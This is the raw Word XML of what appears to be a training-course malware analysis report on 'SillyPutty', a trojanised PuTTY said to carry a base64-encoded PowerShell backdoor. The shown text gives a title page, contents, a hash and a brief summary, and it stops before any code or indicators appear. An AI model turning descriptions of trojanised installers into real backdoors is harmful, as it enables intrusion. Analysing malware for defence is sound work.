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7F3F" w14:textId="4A651FC3" w:rsidR="00635627" w:rsidRDefault="00635627" w:rsidP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</w:p>
    <w:p w14:paraId="2D067C13" w14:textId="02E462A1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  <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="740C85BD" wp14:editId="6AEF6B8B">
            <wp:extent cx="3467100" cy="3572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16" cy="35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C4C7" w14:textId="7DFD9679" w:rsidR="00635627" w:rsidRDefault="00635627" w:rsidP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</w:p>
    <w:p w14:paraId="04829E37" w14:textId="5A9BFCD1" w:rsidR="00635627" w:rsidRP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52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00635627">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="004E76"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>Practical Malware Analysis &amp; Triage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3EB37F" w14:textId="69710A2E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52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00635627">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="004E76"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>Malware Analysis Report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E75D8BB" w14:textId="77777777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44"/>
          <w:szCs w:val="44"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30A069D8" w14:textId="373EF1E9" w:rsidR="00635627" w:rsidRPr="00635627" w:rsidRDefault="00866A2E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44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="004E76"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t xml:space="preserve">Silly Putty – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="004E76"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>Powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="004E76"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t xml:space="preserve"> Shell</w:t>
      </w:r>
      <w:r w:rsidR="00635627">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="004E76"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00635627" w:rsidRPr="00635627">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="004E76"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>Malware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F525F20" w14:textId="77777777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</w:p>
    <w:p w14:paraId="0FADF9CE" w14:textId="44F06457" w:rsidR="00635627" w:rsidRDefault="00866A2E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  <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="004E76"/>
        </w:rPr>
        <w:t>Aug</w:t>
      </w:r>
      <w:r w:rsidR="00635627">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="004E76"/>
        </w:rPr>
        <w:t xml:space="preserve"> 202</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="004E76"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00635627">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="004E76"/>
        </w:rPr>
        <w:t xml:space="preserve"> | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="004E76"/>
        </w:rPr>
        <w:t>LatteRoster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00635627">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="004E76"/>
        </w:rPr>
        <w:t xml:space="preserve"> | v1.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0F51BE" w14:textId="77777777" w:rsidR="00635627" w:rsidRDefault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  <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="004E76"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="0" w:name="_Toc85207993" w:displacedByCustomXml="next"/>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Franklin Gothic Book" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:color w:val="004E76"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:id w:val="815929648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12DEFE4F" w14:textId="056EFD4E" w:rsidR="00635627" w:rsidRPr="00635627" w:rsidRDefault="00635627" w:rsidP="00E20896">
          <w:pPr>
            <w:pStyle w:val="Heading1"/>
          </w:pPr>
          <w:r w:rsidRPr="00635627">
            <w:t>Table of Contents</w:t>
          </w:r>
          <w:bookmarkEnd w:id="0"/>
        </w:p>
        <w:p w14:paraId="43C81C85" w14:textId="1C533815" w:rsidR="00033B0B" w:rsidRDefault="0063562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 w:rsidRPr="00635627">
            <w:rPr>
              <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="00635627">
            <w:rPr>
              <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r w:rsidRPr="00635627">
            <w:rPr>
              <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc85207993" w:history="1">
            <w:r w:rsidR="00033B0B" w:rsidRPr="0015737D">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Table of Contents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_Toc85207993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2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6EFAF25B" w14:textId="5EFD838D" w:rsidR="00033B0B" w:rsidRDefault="00E004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7994" w:history="1">
            <w:r w:rsidR="00033B0B" w:rsidRPr="0015737D">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Executive Summary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_Toc85207994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3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2C30774F" w14:textId="0CD0D9A5" w:rsidR="00033B0B" w:rsidRDefault="00E004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7995" w:history="1">
            <w:r w:rsidR="00033B0B" w:rsidRPr="0015737D">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>High-Level Technical Summary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_Toc85207995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4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5A5DDB0E" w14:textId="4AA54749" w:rsidR="00033B0B" w:rsidRDefault="00E004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7996" w:history="1">
            <w:r w:rsidR="00033B0B" w:rsidRPr="0015737D">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Malware Composition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_Toc85207996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5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5DA97B41" w14:textId="0F1212F1" w:rsidR="00033B0B" w:rsidRDefault="00E004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7997" w:history="1">
            <w:r w:rsidR="00033B0B" w:rsidRPr="0015737D">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>srvupdate.exe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_Toc85207997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5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49EA5E47" w14:textId="13C7FEFF" w:rsidR="00033B0B" w:rsidRDefault="00E004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7998" w:history="1">
            <w:r w:rsidR="00033B0B" w:rsidRPr="0015737D">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>crt1.crt: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_Toc85207998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5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3F2FB8B0" w14:textId="053E9E83" w:rsidR="00033B0B" w:rsidRDefault="00E004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7999" w:history="1">
            <w:r w:rsidR="00033B0B" w:rsidRPr="0015737D">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Basic Static Analysis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_Toc85207999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6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24CD0B2F" w14:textId="08291EA7" w:rsidR="00033B0B" w:rsidRDefault="00E004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0" w:history="1">
            <w:r w:rsidR="00033B0B" w:rsidRPr="0015737D">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Basic Dynamic Analysis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_Toc85208000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7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6932DC58" w14:textId="01A24568" w:rsidR="00033B0B" w:rsidRDefault="00E004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1" w:history="1">
            <w:r w:rsidR="00033B0B" w:rsidRPr="0015737D">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Advanced Static Analysis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_Toc85208001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8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5F3C06BD" w14:textId="2F842B5A" w:rsidR="00033B0B" w:rsidRDefault="00E004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2" w:history="1">
            <w:r w:rsidR="00033B0B" w:rsidRPr="0015737D">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Advanced Dynamic Analysis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_Toc85208002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9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1CDB7AA5" w14:textId="693E7C1A" w:rsidR="00033B0B" w:rsidRDefault="00E004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3" w:history="1">
            <w:r w:rsidR="00033B0B" w:rsidRPr="0015737D">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Indicators of Compromise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_Toc85208003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10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2AFCDAB1" w14:textId="1DD970EF" w:rsidR="00033B0B" w:rsidRDefault="00E004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04" w:history="1">
            <w:r w:rsidR="00033B0B" w:rsidRPr="0015737D">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Network Indicators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_Toc85208004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10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415E8E78" w14:textId="2057DCA7" w:rsidR="00033B0B" w:rsidRDefault="00E004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05" w:history="1">
            <w:r w:rsidR="00033B0B" w:rsidRPr="0015737D">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Host-based Indicators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_Toc85208005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11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638C6716" w14:textId="3F6BFE89" w:rsidR="00033B0B" w:rsidRDefault="00E004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6" w:history="1">
            <w:r w:rsidR="00033B0B" w:rsidRPr="0015737D">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Rules &amp; Signatures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_Toc85208006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13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1C5B9A80" w14:textId="546B8023" w:rsidR="00033B0B" w:rsidRDefault="00E0041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7" w:history="1">
            <w:r w:rsidR="00033B0B" w:rsidRPr="0015737D">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Appendices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_Toc85208007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14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0142DC5F" w14:textId="4DD36ECA" w:rsidR="00033B0B" w:rsidRDefault="00E0041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08" w:history="1">
            <w:r w:rsidR="00033B0B" w:rsidRPr="0015737D">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>A.</w:t>
            </w:r>
            <w:r w:rsidR="00033B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33B0B" w:rsidRPr="0015737D">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Yara Rules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_Toc85208008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14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7D0CE101" w14:textId="1FDE689B" w:rsidR="00033B0B" w:rsidRDefault="00E0041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09" w:history="1">
            <w:r w:rsidR="00033B0B" w:rsidRPr="0015737D">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>B.</w:t>
            </w:r>
            <w:r w:rsidR="00033B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33B0B" w:rsidRPr="0015737D">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Callback URLs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_Toc85208009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14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7220E1EA" w14:textId="10E755FD" w:rsidR="00033B0B" w:rsidRDefault="00E0041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10" w:history="1">
            <w:r w:rsidR="00033B0B" w:rsidRPr="0015737D">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>C.</w:t>
            </w:r>
            <w:r w:rsidR="00033B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33B0B" w:rsidRPr="0015737D">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Decompiled Code Snippets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_Toc85208010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15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65C738A6" w14:textId="7287D1CE" w:rsidR="00635627" w:rsidRPr="00635627" w:rsidRDefault="00635627" w:rsidP="00635627">
          <w:pPr>
            <w:rPr>
              <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium" w:cs="Times New Roman"/>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00635627">
            <w:rPr>
              <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium" w:cs="Times New Roman"/>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="05415DF5" w14:textId="4EB94B26" w:rsidR="00635627" w:rsidRDefault="00635627">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D48395" w14:textId="6CA9AC3A" w:rsidR="00D05AB4" w:rsidRPr="005F08C6" w:rsidRDefault="00480604" w:rsidP="00E20896">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc85207994"/>
      <w:r w:rsidRPr="005F08C6">
        <w:lastRenderedPageBreak/>
        <w:t>Executive Summary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="5BF79D64" w14:textId="455DFA4B" w:rsidR="00480604" w:rsidRDefault="00480604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E000A" w:rsidRPr="004E000A" w14:paraId="0E874BAC" w14:textId="42C80309" w:rsidTr="004E000A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1525" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0532F255" w14:textId="0268EB16" w:rsidR="004E000A" w:rsidRPr="004E000A" w:rsidRDefault="004E000A" w:rsidP="0096700A">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="2748"/>
              </w:tabs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E000A">
              <w:rPr>
                <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>SHA256 hash</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7825" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E29440B" w14:textId="102982EA" w:rsidR="004E000A" w:rsidRPr="004E000A" w:rsidRDefault="00915330" w:rsidP="0096700A">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="2748"/>
              </w:tabs>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium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</w:rPr>
              <w:t>0C82E654C09C8FD9FDF4899718EFA37670974C9EEC5A8FC18A167F93CEA6EE83</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="327B979D" w14:textId="77777777" w:rsidR="005D5761" w:rsidRDefault="005D5761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024A6934" w14:textId="3BF95DDA" w:rsidR="00915330" w:rsidRDefault="00915330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  <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SillyPutty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a </w:t>
      </w:r>
      <w:r w:rsidR="00F73BF4">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">version of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F73BF4">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>well used</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F73BF4">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Putty.exe program that contains a</w:t>
      </w:r>
      <w:r w:rsidR="00E8270E">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E8270E">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E8270E">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> backdoor shell.  It is a 32bit </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E8270E">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>executeable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E8270E">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> that will run on the windows operation system.  The payload is</w:t>
      </w:r>
      <w:r w:rsidR="00131E8B">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> embedded in the program as a base64 </w:t>
      </w:r>
      <w:r w:rsidR="001D4020">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">encoded </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001D4020">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001D4020">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3ABE70" w14:textId="77777777" w:rsidR="00915330" w:rsidRDefault="00915330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6C1D4557" w14:textId="633C48D2" w:rsidR="00915330" w:rsidRDefault="001D4020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t xml:space="preserve">Symptoms of the infection is a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AD3748">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AD3748">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> blue execution window that is started during the execution of the program. The “normal” putty process runs</w:t>
      </w:r>
      <w:r w:rsidR="00FB0783">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FB0783">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>along side</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FB0783">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> the “legitimate</w:t>
      </w:r>
      <w:r w:rsidR="00404257">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00FB0783">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> program. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412AEF0C" w14:textId="77777777" w:rsidR="001D4020" w:rsidRDefault="001D4020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10355489" w14:textId="77777777" w:rsidR="00FB0783" w:rsidRDefault="00FB0783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2C0F6B91" w14:textId="77777777" w:rsidR="00FB0783" w:rsidRDefault="00FB0783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0847F177" w14:textId="614CBC6B" w:rsidR="00E32A25" w:rsidRDefault="00E32A25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57E53168" w14:textId="00B84669" w:rsidR="00E32A25" w:rsidRDefault="00E32A25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41FB2C05" w14:textId="23BB9883" w:rsidR="005F08C6" w:rsidRDefault="005F08C6">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto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br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0B4F96" w14:textId="56BD9A1A" w:rsidR="005F08C6" w:rsidRPr="00E20896" w:rsidRDefault="005F08C6" w:rsidP="00E20896">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc85207995"/>
      <w:r w:rsidRPr="00E20896">
        <w:lastRenderedPageBreak/>
        <w:t>High-Level Technical Summary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="7B051B6D" w14:textId="738A59DB" w:rsidR="00E20896" w:rsidRDefault="009A6BBF" w:rsidP="005F08C6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SillyPutty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> runs along side the legitimate putty functionality. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A06141" w14:textId="77777777" w:rsidR="009A6BBF" w:rsidRPr="00C424D4" w:rsidRDefault="009A6BBF" w:rsidP="005F08C6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79C5A49E" w14:textId="641DFC36" w:rsidR="00E32A25" w:rsidRDefault="00E32A25" w:rsidP="005F08C6"/>
    <w:p w14:paraId="08A4C88A" w14:textId="614C6C56" w:rsidR="00E32A25" w:rsidRDefault="00E32A25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rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium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AB8432C" wp14:editId="2E7A7727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6504940" cy="5795010"/>
            <wp:effectExtent l="0" t="0" r="0" b="53340"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="5503" y="0"/>
                <wp:lineTo x="5250" y="355"/>
                <wp:lineTo x="5187" y="5822"/>
                <wp:lineTo x="6136" y="6817"/>
                <wp:lineTo x="6262" y="18462"/>
                <wp:lineTo x="7148" y="19314"/>
                <wp:lineTo x="7401" y="19314"/>
                <wp:lineTo x="7401" y="20876"/>
                <wp:lineTo x="7591" y="21586"/>
                <wp:lineTo x="7717" y="21728"/>
                <wp:lineTo x="16130" y="21728"/>
                <wp:lineTo x="16257" y="21586"/>
                <wp:lineTo x="16510" y="20805"/>
                <wp:lineTo x="16573" y="15479"/>
                <wp:lineTo x="15814" y="15337"/>
                <wp:lineTo x="6515" y="14769"/>
                <wp:lineTo x="8729" y="14769"/>
                <wp:lineTo x="16383" y="13917"/>
                <wp:lineTo x="16447" y="7740"/>
                <wp:lineTo x="6515" y="6817"/>
                <wp:lineTo x="10627" y="6817"/>
                <wp:lineTo x="16510" y="6178"/>
                <wp:lineTo x="16383" y="355"/>
                <wp:lineTo x="16130" y="0"/>
                <wp:lineTo x="5503" y="0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</w:p>
    <w:p w14:paraId="7D411C62" w14:textId="77777777" w:rsidR="0000714D" w:rsidRDefault="0000714D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04BFADFA" w14:textId="61044E6A" w:rsidR="005F08C6" w:rsidRDefault="00F54E18" w:rsidP="00E20896">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc85207996"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Malware Composition</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="38495D8A" w14:textId="601F07CC" w:rsidR="00F54E18" w:rsidRDefault="00F54E18" w:rsidP="00F54E18">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DemoWare</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> consists of the following component</w:t>
      </w:r>
      <w:r w:rsidR="00C424D4">
        <w:t>s:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F812F43" w14:textId="09FEDBC2" w:rsidR="00C424D4" w:rsidRDefault="00C424D4" w:rsidP="00F54E18"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable4-Accent1"/>
        <w:tblW w:w="10695" w:type="dxa"/>
        <w:tblInd w:w="-673" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1641"/>
        <w:gridCol w:w="9054"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C424D4" w14:paraId="69C9D334" w14:textId="77777777" w:rsidTr="00C4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1BBB434" w14:textId="42D921A6" w:rsidR="00C424D4" w:rsidRPr="00C424D4" w:rsidRDefault="00C424D4" w:rsidP="00C424D4">
            <w:pPr>
